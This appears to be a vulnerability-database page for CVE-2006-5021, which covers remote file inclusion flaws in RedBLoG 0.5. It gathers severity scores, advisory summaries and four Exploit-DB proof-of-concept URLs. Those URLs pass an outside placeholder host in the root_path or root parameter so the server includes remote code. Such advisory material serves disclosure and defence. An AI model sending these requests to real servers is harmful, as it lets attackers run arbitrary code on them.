CVE-2006-5021
published 2006-09-27CVE-2006-5021: Multiple PHP remote file inclusion vulnerabilities in redgun RedBLoG 0.5 allow remote attackers to execute arbitrary PHP code via a URL in (1) the root…
PriorityP337critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
3.12%
86.2th percentile
Multiple PHP remote file inclusion vulnerabilities in redgun RedBLoG 0.5 allow remote attackers to execute arbitrary PHP code via a URL in (1) the root parameter in imgen.php, and the root_path parameter in (2) admin/config.php, (3) common.php, and (4) admin/index.php. NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| redblog | redblog | — | — |
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
VulDB
RedBLoG 0.5 imgen.php root_path file inclusion (BID-20115)
vuldb·2026-04-23·CVSS 9.8
CVE-2006-5021 [CRITICAL] RedBLoG 0.5 imgen.php root_path file inclusion (BID-20115)
A vulnerability, which was classified as critical, has been found in RedBLoG 0.5. This impacts an unknown function of the file imgen.php. Performing a manipulation of the argument root_path results in file inclusion.
This vulnerability is identified as CVE-2006-5021. The attack can be initiated remotely. There is not any exploit available.
GHSA
GHSA-6589-x6h4-26gm: Multiple PHP remote file inclusion vulnerabilities in redgun RedBLoG 0
ghsa_unreviewed·2022-05-01
CVE-2006-5021 [HIGH] CWE-94 GHSA-6589-x6h4-26gm: Multiple PHP remote file inclusion vulnerabilities in redgun RedBLoG 0
Multiple PHP remote file inclusion vulnerabilities in redgun RedBLoG 0.5 allow remote attackers to execute arbitrary PHP code via a URL in (1) the root parameter in imgen.php, and the root_path parameter in (2) admin/config.php, (3) common.php, and (4) admin/index.php. NOTE: the provenance of this information is unknown; the details are obtained from third party information.
No detection rules found.
Exploit-DB
RedBLoG 0.5 - '/admin/index.php?root_path' Remote File Inclusion
exploitdb·2006-09-19
CVE-2006-5021 RedBLoG 0.5 - '/admin/index.php?root_path' Remote File Inclusion
RedBLoG 0.5 - '/admin/index.php?root_path' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/20115/info
The redblog application is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/Path/admin/index.php?root_path=htpp://www.example.com
Exploit-DB
RedBLoG 0.5 - 'imgen.php?Root' Remote File Inclusion
exploitdb·2006-09-19
CVE-2006-5021 RedBLoG 0.5 - 'imgen.php?Root' Remote File Inclusion
RedBLoG 0.5 - 'imgen.php?Root' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/20115/info
The redblog application is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/Path/imgen.php?root=http://www.example.com
Exploit-DB
RedBLoG 0.5 - 'common.php?root_path' Remote File Inclusion
exploitdb·2006-09-19
CVE-2006-5021 RedBLoG 0.5 - 'common.php?root_path' Remote File Inclusion
RedBLoG 0.5 - 'common.php?root_path' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/20115/info
The redblog application is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/Path/common.php?root_path=http://www.example.com
Exploit-DB
RedBLoG 0.5 - '/admin/config.php?root_path' Remote File Inclusion
exploitdb·2006-09-19
CVE-2006-5021 RedBLoG 0.5 - '/admin/config.php?root_path' Remote File Inclusion
RedBLoG 0.5 - '/admin/config.php?root_path' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/20115/info
The redblog application is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/Path/admin/config.php?root_path=http://www.example.com
No writeups or analysis indexed.
2006-09-27
Published